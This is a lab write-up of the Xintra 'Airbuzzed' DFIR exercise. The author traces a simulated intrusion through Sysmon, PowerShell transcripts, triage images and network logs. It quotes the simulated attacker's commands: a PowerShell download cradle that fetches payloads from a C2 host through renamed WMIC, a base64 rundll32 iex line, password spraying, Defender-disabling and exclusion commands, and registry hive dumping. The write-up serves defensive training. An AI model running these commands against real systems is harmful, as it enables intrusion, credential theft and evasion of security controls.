Airbuzzed from Xintra.org is a DFIR lab that simulates a full attack chain against a fictional company called Airbuzz. This write-up walks through how I approached each category of questions, covering social engineering, establishing persistence, DLL sideloading, credential dumping, defense evasion, exfiltration, payload execution, and network log analysis.
Social Engineering
Q1: During a review of the team’s conversation, we discovered that Rebecca Dean sent her public SSH keys to Robbert Carr. These keys are to be added to the code servers, enabling her to start working on the update for the aeromgmt project. Provide the exact SSH keys for Rebecca Dean.
THis one I solved by looking through the .pst file in XstReader and finding the message containing the key.
Q2: Upon reviewing the team’s chat, it was noted that Rebecca asked Robert Carr to add a specific part of the code to app.py after any of the existing routes. Could you confirm when Rebecca sent this request to Robert via Teams? Answer should be in UTC format
Again by looking through the indivudal messages I found the one that mentioned routes and looked like Python code. To find the exact timestamp I needed to open the properties for the message and under the field named `` was the timestamp.
Q3: As Rebecca Dean was tricked into downloading the file quiz.rar from LinkedIn, she was unaware that it contained malicious files. During the investigation, we found metadata within the Zone.Identifier ADS for quiz.rar. Which URL indicates the original source from where quiz.rar was downloaded? Provide the full URL.
I tried to see if the ADS was present in the malware triage with Get-Item quiz.rar -Stream * but there was no Zone.Identifier stream attached to the file. I pivoted to ELK and found in the eventlogs that they had Sysmon and there was an event id 15 which is FileCreateStreamHash that contained the contents of the Zone.Identifier.
Q4: Upon analyzing the quiz.rar, it contains a file that can reveal the hostname of the attacker. Provide the hostname.
This one I spent some time on, as I noticed the unarchived version of quiz.rar revealed several files, including a few PE files and I thought I had to find something in the compile information with PEStudio. However it turned out that it was the lnk file that contained what I was looking for. I used LECmd from Zimmerman to parse the file, which revealed a UNC path that was attached to the file, revealing the hostname.
Q5: On June 21st, Rebecca Dean instructed Robert Carr to add a Python package to the requirements.txt file. What is the name of the Python package?
Again, looked through the mails.
Patient Zero
Q1: To establish persistence, the threat actor needs to create a task that runs periodically. When did the threat actor create the malicious scheduled task set to execute at system startup on ABZ-PC-01? Answer should be un UTC format
First I tried to filter in the ELK for event id 4698 which is A scheduled task was created and in the local eventlogs. There was no hits on this event id, but event id 106 from Microsoft-Windows-TaskScheduler revealed a lot of tasks being created.
I went through them all and noticed a strange on called \HPSync02, which I searched for in ELK and it revealed Powershell Transcripts showing schtasks /create /tn HPSync02 /tr "c:\\Windows\\Temp\\servicehost.exe" /sc onstart /ru System. It was also shown in Sysmon event id 1 which reveals process creation.
I went back to the event logs and found the timestamp there.
Q2: As a follow-up question, what is the name and process ID of the parent process that spawned the schtasks.exe process used to create the scheduled task? Please provide the full path of the executable followed by the process ID, separated by a semicolon (;).
In the sysmon process creation event the ParentImage is shown along with the ParentProcessID.
Q3: During the investigation of the suspicious scheduled task created by schtasks.exe, which file was identified as the malicious executable to be executed? Provide the full path. Checked the pwsh transcript logs for, and already found it when the task was created.
Q4: The threat actor was observed to be using some sort of RMM (Remote Monitoring and Management) tool to move laterally and gain persistence to the compromised systems. By analyzing the the ABZ-FS-01 server, can you give the exact service name that was created on 2024-06-25 09:06:12?
I started by looking in the Prefetch - which I was kinda surprised to find on a server, but whatever -, and noticed a Prefetch entry called MESHAGENT.EXE-88776BB8.pf and TACTICALAGENT-V2.7.0-WINDOWS--6BF8F6A1.pf which stood out to me. I tracked it to be https://docs.tacticalrmm.com/install_agent/.
I followed the lead in ELK and found a pwsh transcript containing the installation
$innosetup = 'tacticalagent-v2.7.0-windows-amd64.exe'
$api = '"https://api.downloadmirror.net"'
$clientid = '1'
$siteid = '1'
$agenttype = '"server"'
$power = 0
$rdp = 1
$ping = 0
$auth = '"efdc11b9169715cf59584b252ce0945b1192a8b009eaad6fac33386dd3ddcb6b"'
$downloadlink = 'https://github.com/amidaware/rmmagent/releases/download/v2.7.0/tacticalagent-v2.7.0-windows-amd64.exe'
$apilink = $downloadlink.split('/')
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$serviceName = 'tacticalrmm'
If (Get-Service $serviceName -ErrorAction SilentlyContinue) {
write-host ('Tactical RMM Is Already Installed')
} Else {
$OutPath = $env:TMP
$output = $innosetup
$installArgs = @('-m install --api ', "$api", '--client-id', $clientid, '--site-id', $siteid, '--agent-type', "$agenttype", '--auth', "$auth")
if ($power) {
$installArgs += "--power"
}
if ($rdp) {
$installArgs += "--rdp"
}
if ($ping) {
$installArgs += "--ping"
}
Try
{
$DefenderStatus = Get-MpComputerStatus | select AntivirusEnabled
if ($DefenderStatus -match "True") {
Add-MpPreference -ExclusionPath 'C:\Program Files\TacticalAgent\*'
Add-MpPreference -ExclusionPath 'C:\Program Files\Mesh Agent\*'
Add-MpPreference -ExclusionPath 'C:\ProgramData\TacticalRMM\*'
}
}
...
I then looked at services being created within that exaact timescope and filtered for event id 13 which is registry value set, which happens when a new service is created. I looked at the Display Name and found the service name. It was quite annoying because at first I thought the name was just tacticalrmm.
Dll Side loading
Q1: We observed a malicious DLL named 354465SBSMBUS_SDK.dll, which executes PowerShell scripts via rundll32 and was downloaded from the threat actor’s C2 server. Upon investigating the ABZ-PC-01 system, when was the first process associated with this DLL created? Additionally, who was the user that executed it?
I remember that while looking for the tacticalrmm question in the rdean powershell transcripts, I noticed rundll32 being invoked.
Host Application: rundll32 C:\Windows\Temp\354465_SB_SMBUS_SDK.dll,main
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String
(YwBwACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHcAYgBlAG0AXABXAE0ASQBDAC4AZQB4AGUAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAFIAdABrAEIAdABNAGEAbgBTAGUAcgB2AC4AZQB4AGUA))
| iex
It seems that rundll32 executes 354465_SB_SMBUS_SDK.dll with the main function as entrypoint with an base64 encoded string as argument which is piped into invoke-expression to execute directly in-memory.
Classic LOLBAS https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
The cool thing about powershell transcripts is that it store a lot of valuable information
Start time: 20240625082640
Username: AIRBUZZ\rdean
RunAs User: AIRBUZZ\rdean
Configuration Name:
However, apparently this was not the correct timestamp, as I would have to find the execution timestamp from Sysmon in ELK and the timestamp was off by 1 second. Could be caused byt different time resolutions or rounding.
Q2: After the threat actor dropped the 354465SBSMBUS_SDK.dll, it immediately performed execution with some base64 strings on it. Decode the whole value of the b64 strings as part of the execution and provide the full decoded values
The base64 is decoded to cp C:\Windows\System32\wbem\WMIC.exe C:\Windows\Temp\RtkBtManServ.exe
Q3: The threat actor used DLL sideloading to execute their payload. They utilized the known staging directory to stage their toolkits and downloaded an original Microsoft Windows binary, renaming it in the process. Can you identify the original Windows binary name into which C:\Windows\Temp\wbemcomn.dll was loaded as part of the threat actor’s DLL sideloading technique?
In ELK i wildcard-searched the dll and found a commandline parameter showing:
CommandLine: "C:\Windows\Temp\RtkBtManServ.exe" /node:10.0.2.5 process call create
"powershell.exe -c iwr -Uri https://update.downloadmirror.net/programs/servicehost.exe -OutFile C:\\Windows\\Temp\\servicehost.exe ;
iwr -Uri https://update.downloadmirror.net/programs/wbemc.dll -OutFile C:\\Windows\\Temp\\wbemc.dll ;
iwr -Uri https://update.downloadmirror.net/programs/wbemcomn.dll -OutFile C:\\Windows\\Temp\\wbemcomn.dll ;
C:\\Windows\\Temp\\servicehost.exe"
which displays a process RtkBtManServ.exe (which looks like wmic) creating a powershell download-cradle that writes three files (servicehost.exe, wbemc.dll and wbemcomn.dll) to C:\Windows\Temp\, subsequently launching C:\\Windows\\Temp\\servicehost.exe.
I dug into this process using this KQL query that looked as Sysmon process creation events.
host.name: "abz-pc-01" AND
*servicehost.exe* AND
event.code: "1" AND *Temp*
This revealed that the OriginalFileName field for servicehost.exe is Wmiprvse.exe.
This really looks like DLL sideloading. The DLL files are dropped in the same directory as the executable, which makes it possible to hijack the DLL search order. Since wmiprvse.exe looks in its current directory first when loading DLLs, it ends up loading the malicious ones instead of the legit system DLLs. (https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/)
Credential Dumping
Q1: To gain additional access to user accounts within the network, the threat actor executed a password spraying attack against multiple accounts. What is the name of the specific PowerShell function they utilized for this task?
Again looking through the pwsh transcripts for rdean reveals a lot of information. Appears that the threat actor used https://github.com/dafthack/DomainPasswordSpray to conduct their spray with a single password.
Invoke-DomainPasswordSpray -Password "Airbuzz@2024" -Domain "AIRBUZZ" -Force;
>> CommandInvocation(Out-String): "Out-String"
**********************
Command start time: 20240622013632
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="[*] The domain password policy observation window is set to 10 minutes."
>> ParameterBinding(Out-String): name="InputObject"; value="[*] Setting a 10 minute wait in between sprays."
>> ParameterBinding(Out-String): name="InputObject"; value="[*] Password spraying has begun with 1 passwords"
>> ParameterBinding(Out-String): name="InputObject"; value="[*] This might take a while depending on the total number of users"
**********************
Command start time: 20240622013632
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="[*] Now trying password Airbuzz@2024 against 13 users. Current time is 1:36 AM"
>> ParameterBinding(Out-String): name="InputObject"; value="[*] Writing successes to "
**********************
From the output of the transcript it didnt appear that there were any successes.
Q2: What password did the threat actor attempt to spray on all users?
Look at the cmdlet
Q3: Rebecca’s password was saved in her Chrome browser and potentially retrieved by the threat actor using PowerShell. What is the password Rebecca used for her Gmail account?
The pwsh transcripts revealed that the TA used a tool called extract.exe to create winlog0.dat which had the following output:
PS>Get-Content C:\\Windows\\Temp\\winlog0.dat
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="=================================================="
>> ParameterBinding(Out-String): name="InputObject"; value="Origin URL : https://login.microsoftonline.com/"
>> ParameterBinding(Out-String): name="InputObject"; value="Action URL : "
>> ParameterBinding(Out-String): name="InputObject"; value="User Name Field : "
>> ParameterBinding(Out-String): name="InputObject"; value="Password Field : "
>> ParameterBinding(Out-String): name="InputObject"; value="User Name : "
>> ParameterBinding(Out-String): name="InputObject"; value="Password : "
>> ParameterBinding(Out-String): name="InputObject"; value="Created Time : 6/3/2024 9:29:14 AM"
>> ParameterBinding(Out-String): name="InputObject"; value="Password Strength : Very Weak"
>> ParameterBinding(Out-String): name="InputObject"; value="Password File : C:\Users\rdean\AppData\Local\Google\Chrome\User Data\Default\Login Data"
(...)
The hash of extract.exe is SHA256: a1d5b76cf39643d1ce4e5835aa5af91ed96dc924c841263cae407eec3e5dd420? which is ChromePass from Nirsoft.
However I couldnt find the gmail account, there was only entries for canva.com and linkedin.com. However the password for the linkedin account was the right one, which is kinda misleading if you read the question and trying to find a Gmail entry - i guess she is having password-reuse..
Q4: The threat actor also used another binary for credential access, using a custom keylogger downloaded from their known C2 server. The executable “Proactive.exe” was downloaded by the user rdean on ABZ-PC-01. Can you provide the exact date and time (in UTC) when this binary was created on the disk?
I knew that the host had Sysmon, so we could utilize event id 11 which is FileCreate in ELK.
I correlated this timestamp with the $MFT-entry for the file and it gave me the same timestamp.
Q5: In the PowerShell script designed to take periodic screenshots, what is the interval, in seconds, between each screenshot? Provide the answer as a numeric value.
I spotted a pwsh script called “WindowsUpdate.ps1” located in C:\Windows\Temp which is the same staging dir that the TA used.Thats kinda odd. Looking into the script it revealed:
$a='Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;
function Generate-RandomFileName {$length=Get-Random -Minimum 5 -Maximum 13;$randomNumber=-join ((48..57)+(65..90)+(97..122)
(..)
{Take-Screenshot;Sleep 30}';iex $a
Which is basically a PowerShell script that uses .NET (System.Windows.Forms and System.Drawing imports) to take screenshots of the screen, save them in AppData with a random filename, and then repeat that every 30 seconds in an infinite loop.
All the files are still located in \C\Users\rdean\AppData\Roaming\Microsoft\Windows\Themes by .dat files.
Q5: By analyzing the screenshots created by the custom PowerShell script used by the threat actor, it was discovered that a specific screenshot, named DMzhVyT.dat, contained stolen code. Can you provide the full path where the codes on the screenshot is stored?
I found the file in that location and opened it with paint as it was a simple image - nothing fancy.
The image shows Notepad++ having the code opened. In the title of the Notepad++ window the path can be seen.
Q6: A sensitive file, creds.yml, was found on ABZ-APP-01, potentially containing credentials. What is the ‘access time’ of creds.yml?
This is a linux system, and I could see that in the triage images there was a UAC image of the host.
I always checks the bodyfile because as the docs say:
The body file is an intermediate file when creating a timeline of file activity. source: https://wiki.sleuthkit.org/index.php?title=Body_file
With this format:
MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
note that the timestamps are in linux epoch format, and have to be converted to UTC using tool like https://www.unixtimestamp.com/
Browser History Insights
Q1: Based on the ABZ-PC-01, the user “rdean” has multiple Google searches recorded in their Chrome history logs. What was the search query used in the Google search performed at 9:14:08 AM on June 19, 2024
As we have the triage image of this host and the AppData directory is there showing Google Chrome User data C:\Labs\Evidence\Airbuzzed\TriageImages\ABZ-PC-01\C\Users\rdean\AppData\Local\Google\Chrome\User Data we can use a tool like hindsight to parse the data and had the search query.
I did have some troubles using the gui app of hindsight in this lab, and usually I don’t have face a problem with it. I dont know why.
Evasion Techniques
Q1: After gaining privileged access to a compromised account, the threat actor performed a defense evasion technique by adding a specific directory, where they staged their toolkits, to the antivirus exclusion list. Can you tell me when the threat actor performed this activity on ABZ-PC-01?
I feel like there is so many wins in the pwsh transcripts if you just spend your time looking through them.. HOWEVER the timestamp put in there is wrong. That’s when the command was typed in the pwsh session, however to find the exact timestamp when the configuration changed you will have to go the event provider for defender Microsoft-Windows-Windows Defender event id 5007 to find it.
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Windows Defender" Guid="{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}" />
<EventID>5007</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2024-06-19T20:46:39.0001492Z" />
<EventRecordID>361</EventRecordID>
<Correlation />
<Execution ProcessID="3808" ThreadID="9492" />
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>ABZ-PC-01.internal.airbuzz.space</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="Product Name">Microsoft Defender Antivirus</Data>
<Data Name="Product Version">4.18.24050.7</Data>
<Data Name="Old Value" />
<Data Name="New Value">HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\c:\windows\temp = 0x0</Data>
</EventData>
</Event>
Q2: Regarding the AV exclusion on ABZ-PC-01, can you provide the full directory path that was added to the AV exclusion list?
Ez pz
Q3: By analyzing the UAC output, you find the bash history of the app user and may identify several deletion events executed by the attacker as part of their defense evasion techniques. Can you provide the file name (including the extension) of the first file that was removed?
We had the UAC output for ABZ-APP-01 which also fetched the bash history file.
Q4: A renamed binary was utilized to remotely execute a PowerShell script aimed at disabling Windows Defender as part of the threat actor’s defense evasion techniques. Can you provide the complete name of this binary, including its file extension?
I assumed that this was related to the previous wmic activity we saw earlier, so I searched in ELK for the field process.pe.original_file_name:wmic.exe which gave me 8 results.
The first result was related to the DLL sideloading previously, but the next one was related to defense evasion by disabling defender.
CommandLine: "C:\Windows\Temp\RtkBtManServ.exe" /node:10.0.2.4 process call create
"powershell.exe -c Set-MpPreference -DisableIntrusionPreventionSystem True -DisableIOAVProtection True -DisableRealtimeMonitoring True
-DisableScriptScanning True -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force
-MAPSReporting Disabled -SubmitSamplesConsent NeverSend"
Q5: Robert Carr deleted a file on PC02 on 2024-06-19 at 07:02:21. What was the file size of the deleted item?
This one was quite easy as KAPE modules were ran on the triage image already leaving us with the output from https://github.com/EricZimmerman/RBCmd which contains the filesize https://github.com/EricZimmerman/RBCmd/blob/master/RBCmd/CsvOut.cs#L8.
Exfiltration
Q1: While investigating ABZ-DC-01, user “kmason” executed a command using “reg.exe” on June 25, 2024, at 08:57:09 AM. What was the output file specified for saving the HKLM\SAM registry key?
Decided to use ELK for this one: process.name: reg.exe and agent.name:"ABZ-DC-01" and event.code: 1
Seems like the threat actor decided to export several hives using reg.exe and saving them to .json files.
reg save hklm\system C:\\Windows\\Temp\\Software.json
I guess he is saving them as .json files to evade static detection rules.
Q2: A threat actor was observed performing staging on ABZ-DC-01 by aggregating .json files into a single location. What was the password used for the archive during the data exfiltration process
I checked the pwsh transcripts on the DC xd.
Q3: Following the successful data staging of the SAM and System hives dumps on ABZ-DC-01, what is the name of the compressed file created by the threat actor? Give the full path of the file.
Shows in the output of the transcript
Q4: What is the file size, in bytes, of the compressed file created by the threat actor during the data exfiltration stage on ABZ-DC-01?
Used the $MFT to find the filesize.
Payload Execution
Q1: PC02 consist of interesting evidence of execution. What’s the SHA1 hash value of c:\windows\temp\servicehost.exe?
Sysmon in ELK also contains Event ID 29: FileExecutableDetected which I used here.
Q2: What is the process ID of the suspected TA’s C2 agent found on ABZ-APP-01, which was executed on June 21 at 11:34
Looked at the process ps found in the UAC live response output. There I could see when the process was started along with the process id.
Q3: Based on the identified process ID of the suspected C2 agent, provide its MD5 hash
UAC hashes all runnings processes with md5 and provides it as output in the live response directory. Use the previously found PID to correlate and find the MD5.
Q4: Who is the user that owns the process with PID 55773, which was started on Fri Jun 21 11:33:57 2024 and is running the executable at /tmp/lock?
Looking at the process output, we can see the owner.
Dissecting Network Logs
Q1: By analyzing the PCAP file using Zeek’s ZUI, we can easily see the Suricata alerts that are triggered after importing the entire PCAP file. You may also notice that the internal IP address 10.0.3.4 was connected to an external IP suspected to be the command and control (C2) channel of the threat actor. What is the threat actor’s C2 IP address?
This one I found by using Sysmon event id 22. Didn’t actually end up using the pcap for this.
Q2: After obtaining the C2 IP address of the threat actor, what host or domain does it resolve to?
Same with Q1.
Q3: For the PCAP file, we also need to look for DNS entries in Zui. While checking, we also observed DNS queries related to a known RMM tool. Provide the exact DNS query related to RMM
_path=="dns" and id.orig_h==10.0.3.4 | count() by query
Q4: In the NGINX access logs on ABZ-PRX-01 from June 21, 2024, what user agent is associated with the multiple /testing POST requests made by the IP address 194.195.245.225, which is one of the IP addresses of the threat actor? Quite easy to find in ELK nginx dataview.
Mapping the Infrastructure
Q1: ABZ-APP-01 contains a lot of important information of the Airbuzz as a company. What is the OS kernel build number of this Linux server?
Found it in the dmesg in liveresponse on the UAC image.
Threat Actors’ Arsenal
Q1: Although we have identified the suspected C2 agent on ABZ-APP-01, we still need to determine the C2 domain used by the threat actor when running this agent. Can you provide the full domain of the attacker’s C2? I spent way to long time looking in the UAC output to realize that we actually got the beacon in the malware folder.
Decided to use Sysinternals strings on the file to see if I could hit the domain.
strings.exe -d C:\Labs\Evidence\Airbuzzed\TriageImages\MalwareSample\MalwareSample\Malware\lock | findstr http
Q2: The malware folder contains multiple executables and a single .jpg file. This file does not appear to be a real image. What is the imphash of cat.jpg?
I was not 100% aware of what imphash was, but it turns out that instead of hashing the file you hash the import table in a executable. I couldn’t find a tool that could do it in the Tools directory, so I decided to see if I could find some OSINT on the file hash. Which lead me to VT where the IMPHASH is.
Q3: One of the tools used by the TA is an executable called extract.exe. While we don’t know yet the usage of this program, can you provide the “File Description” of this binary based on its metadata?
Pretty easy as it was in the meta data.
Q4: What is the original file name of 354465SBSMBUS_SDK.dll? Again metadata. Seems to be a way of running pwsh only using dlls and not powershell.exe.